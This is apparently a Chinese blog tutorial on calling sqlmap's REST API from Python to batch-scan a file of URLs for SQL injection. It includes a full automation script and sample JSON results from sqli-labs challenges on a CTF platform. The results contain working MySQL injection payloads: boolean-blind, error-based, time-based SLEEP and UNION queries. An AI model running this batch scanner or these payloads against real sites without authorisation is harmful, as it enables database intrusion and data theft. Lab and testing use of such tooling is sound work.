python实现sqlmapapi调用实现批量
Posted Rgylin
环境
sqlmap是可以被python调用的
首先在cmd中输入以下命令,以服务端(server)模式启动 sqlmapapi,下文的请求都发往 http://127.0.0.1:8775:
python sqlmapapi.py -s
然后用python创建一个新任务,与其建立连接
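import requests

# Ask the local sqlmapapi server (started with `-s`) to create a new task.
url = 'http://127.0.0.1:8775/task/new'
res1 = requests.get(url)
print(res1.content.decode('utf-8'))
# Every later request addresses the task by its id, so keep the "taskid"
# field of the JSON reply; the snippets below use it as `taskId`.
taskId = res1.json()['taskid']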
设置任务Id扫描信息
# Store the scan options on the task. `data` (the option dict holding the
# target url) and `header` (JSON content type) are the dicts built in the
# complete script further down; `json` has to be imported as well.
set_url = f'http://127.0.0.1:8775/option/{taskId}/set'
option_body = json.dumps(data)
res_set_url = requests.post(set_url, data=option_body, headers=header)
开始扫描对应Id的任务
# Start the scan for this task; the same JSON option body is posted again.
start_url = f'http://127.0.0.1:8775/scan/{taskId}/start'
start_body = json.dumps(data)
res_start_url = requests.post(start_url, data=start_body, headers=header)
# Uncomment to inspect the raw JSON reply:
#print(res_start_url.content.decode('utf-8'))
读取扫描状态判断结果
# Query the task's current scan status.
status_url = f'http://127.0.0.1:8775/scan/{taskId}/status'
res_status = requests.get(status_url)
# Uncomment to inspect the raw JSON reply:
#print(res_status.content.decode('utf-8'))
读取数据
# Fetch the findings collected for the task and print the raw JSON text.
task_data_url = f'http://127.0.0.1:8775/scan/{taskId}/data'
task_data_res = requests.get(task_data_url)
findings_text = task_data_res.content.decode('utf-8')
print(findings_text)
综合以上步骤的完整脚本
import requests
import json
import time
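def sqlapi(url):
    """Scan one URL through the local sqlmapapi REST server and save the result.

    Creates a task, stores the target URL as the task's option, starts the
    scan, polls the status endpoint every 3 seconds while the scan is running
    and then appends the raw JSON text of ``/scan/<taskid>/data`` to the
    module-level file object ``f`` (opened by the caller).

    Args:
        url: Target URL. Surrounding whitespace, such as the newline left by
            ``readlines()``, is stripped; an empty value is skipped.

    Returns:
        None. Progress is printed; when a step is rejected by the API a
        failure message is printed and the function returns early.
    """
    # Loopback address of the sqlmapapi server started with `-s`.
    api = 'http://127.0.0.1:8775'
    # Seconds per request, so a stalled API server cannot hang the whole batch.
    timeout = 10
    header = {'Content-Type': 'application/json'}

    target = url.strip()
    if not target:
        return
    body = json.dumps({'url': target})

    created = requests.get(api + '/task/new', timeout=timeout).json()
    # Check the JSON "success" field itself: the substring 'success' is also
    # present in a failure reply ({"success": false, ...}), so a substring
    # test can never fail. Read the task id only after that check.
    if not created.get('success'):
        print('sqlmapapi create failed')
        return
    taskId = created['taskid']
    print('sqlmapapi create success')

    # Apply the settings
    task_set_url = api + '/option/' + taskId + '/set'
    configured = requests.post(
        task_set_url, data=body, headers=header, timeout=timeout
    ).json()
    if not configured.get('success'):
        print('setting failed')
        return
    print('setting success')

    # Start the scan
    task_start_url = api + '/scan/' + taskId + '/start'
    started = requests.post(
        task_start_url, data=body, headers=header, timeout=timeout
    ).json()
    if not started.get('success'):
        print('scan start failed')
        return
    print('scan start success')

    task_status_url = api + '/scan/' + taskId + '/status'
    while True:
        state = requests.get(task_status_url, timeout=timeout).json()
        # Compare the status value exactly; a substring test for 'running'
        # would also match a "not running" status and poll forever.
        if state.get('status') == 'running':
            print('sqlmap are running ')
            time.sleep(3)
            continue
        task_data_url = api + '/scan/' + taskId + '/data'
        task_data_res = requests.get(task_data_url, timeout=timeout)
        f.write(task_data_res.content.decode('utf-8'))
        # Separate consecutive results; without it two JSON documents run
        # together as "}{" in the output file.
        f.write('\n')
        break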
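if __name__ == '__main__':
    # sqlapi() writes to the module-level name `f`, so the results file must
    # be bound to exactly that name. The `with` block closes both files even
    # if a request raises; utf-8 matches the decoded text sqlapi() writes.
    with open('C:/Users/ASUS/Desktop/res.txt', 'a+', encoding='utf-8') as f, \
            open('url.txt', 'r') as targets:
        for line in targets:
            # Drop the trailing newline and skip blank lines so neither ends
            # up in the "url" option sent to the API.
            target = line.strip()
            if not target:
                continue
            print(target)
            sqlapi(target)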
效果为(res.txt 中的内容,每个目标对应一段依次追加的 JSON 结果):
{
"success": true,
"data": [
{
"status": 1,
"type": 0,
"value": {
"url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-1/",
"query": "id=1",
"data": null
}
},
{
"status": 1,
"type": 1,
"value": [
{
"place": "GET",
"parameter": "id",
"ptype": 2,
"prefix": "'",
"suffix": " AND '[RANDSTR]'='[RANDSTR]",
"clause": [
1,
8,
9
],
"notes": [],
"data": {
"1": {
"title": "AND boolean-based blind - WHERE or HAVING clause",
"payload": "id=1' AND 8661=8661 AND 'sHbo'='sHbo",
"where": 1,
"vector": "AND [INFERENCE]",
"comment": "",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": 200,
"falseCode": 200
},
"2": {
"title": "mysql >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
"payload": "id=1' AND (SELECT 8903 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(8903=8903,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vTDo'='vTDo",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
"comment": "",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": null,
"falseCode": null
},
"5": {
"title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
"payload": "id=1' AND (SELECT 1923 FROM (SELECT(SLEEP([SLEEPTIME])))BiUc) AND 'Tryd'='Tryd",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
"comment": "",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": 200,
"falseCode": null
},
"6": {
"title": "Generic UNION query (NULL) - 1 to 20 columns",
"payload": "id=-3722' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707871,0x7352646f5a70544c714d52424c656f6d534b5570614f50776b7244486c5a4d45684e6a6a4f575441,0x716a7a7171)-- -",
"where": 2,
"vector": [
2,
3,
"[GENERIC_SQL_COMMENT]",
"'",
" AND '[RANDSTR]'='[RANDSTR]",
"NULL",
2,
false,
null,
null,
null
],
"comment": "[GENERIC_SQL_COMMENT]",
"templatePayload": null,
"matchRatio": 0.955,
"trueCode": null,
"falseCode": null
}
},
"conf": {
"textOnly": null,
"titles": null,
"code": null,
"string": "Your",
"notString": null,
"regexp": null,
"optimize": null
},
"dbms": "MySQL",
"dbms_version": [
">= 5.0"
],
"os": null
}
]
}
],
"error": []
}{
"success": true,
"data": [
{
"status": 1,
"type": 0,
"value": {
"url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-2/",
"query": "id=2",
"data": null
}
},
{
"status": 1,
"type": 1,
"value": [
{
"place": "GET",
"parameter": "id",
"ptype": 1,
"prefix": "",
"suffix": "",
"clause": [
1,
8,
9
],
"notes": [],
"data": {
"1": {
"title": "AND boolean-based blind - WHERE or HAVING clause",
"payload": "id=2 AND 8114=8114",
"where": 1,
"vector": "AND [INFERENCE]",
"comment": "",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": 200,
"falseCode": 200
},
"2": {
"title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
"payload": "id=2 AND (SELECT 6380 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(6380=6380,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
"comment": "",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": null,
"falseCode": null
},
"5": {
"title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
"payload": "id=2 AND (SELECT 9669 FROM (SELECT(SLEEP([SLEEPTIME])))Seva)",
"where": 1,
"vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
"comment": "",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": 200,
"falseCode": null
},
"6": {
"title": "Generic UNION query (NULL) - 1 to 20 columns",
"payload": "id=-3623 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7671,0x4948684a5a6170425875694658705767516e704a77666a415346726754454e6c5376414a70546158,0x716b716b71)-- -",
"where": 2,
"vector": [
2,
3,
"[GENERIC_SQL_COMMENT]",
"",
"",
"NULL",
2,
false,
null,
null,
null
],
"comment": "[GENERIC_SQL_COMMENT]",
"templatePayload": null,
"matchRatio": 0.948,
"trueCode": null,
"falseCode": null
}
},
"conf": {
"textOnly": null,
"titles": null,
"code": null,
"string": "Your",
"notString": null,
"regexp": null,
"optimize": null
},
"dbms": "MySQL",
"dbms_version": [
">= 5.0"
],
"os": null
}
]
},
{
"status": 1,
"type": 2,
"value": "back-end DBMS: MySQL >= 5.0 (MariaDB fork)"
}
],
"error": []
}